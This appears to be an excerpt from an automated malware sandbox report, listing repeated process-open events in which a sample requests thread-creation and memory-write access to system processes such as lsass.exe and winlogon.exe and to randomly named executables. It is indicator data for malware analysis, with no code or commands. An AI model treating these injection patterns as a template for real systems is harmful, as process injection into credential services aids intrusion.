| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
